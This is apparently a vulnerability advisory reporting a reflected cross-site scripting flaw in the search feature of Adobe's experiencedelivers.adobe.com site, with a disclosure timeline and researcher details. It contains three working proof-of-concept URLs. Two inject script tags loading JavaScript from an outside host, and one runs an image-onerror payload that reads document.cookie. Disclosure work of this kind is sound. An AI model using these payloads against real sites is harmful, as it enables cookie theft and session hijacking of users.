----------------------------------------------------------------------------------------------------
Title : Adobe Experience Delivers reflected Cross-site Scripting (XSS) vulnerability
Vendor : Adobe Systems Incorporated (http://www.adobe.com)
Description : experiencedelivers.adobe.com is vulnerable to reflected Cross-site Scripting attacks
Advisory time-line:
----------------------------------------------------------------------------------------------------
- Vendor PSIRT notified : 05-Aug-2012
- Vendor response : 05-Aug-2012. Ticket created. "Looking into it now".
- Status requests : 09-Sep-2012, 01-Nov-2012, 08-Nov-2012, 13-Nov-2012, 31-Dec-2012
Adobe PSIRT has not responded to any requests after 09-Nov-2012
- Packet Storm advisory : 19-Jan-2013
Test environment
----------------------------------------------------------------------------------------------------
- Latest Firefox browser
Details
----------------------------------------------------------------------------------------------------
Affected functionality: search function
Test #1: Remote Javascript execution: display browser cookie
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2FSCRIPT%3E&blog=search&_charset_=UTF-8
Test #2, Remote Javascript execution: overwrite HTML content - PoC
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Fae00.js%3E%3C%2Fscript%3E&blog=search&_charset_=UTF-8
Test #3, Alert test with image-tag
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&blog=search&_charset_=UTF-8
Note: the Javascript test cases are not malicious.
Researcher
----------------------------------------------------------------------------------------------------
Janne Ahlberg
Twitter: https://twitter.com/JanneFI
Blog: http://janne.is
Project site: http://idash.net
----------------------------------------------------------------------------------------------------
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information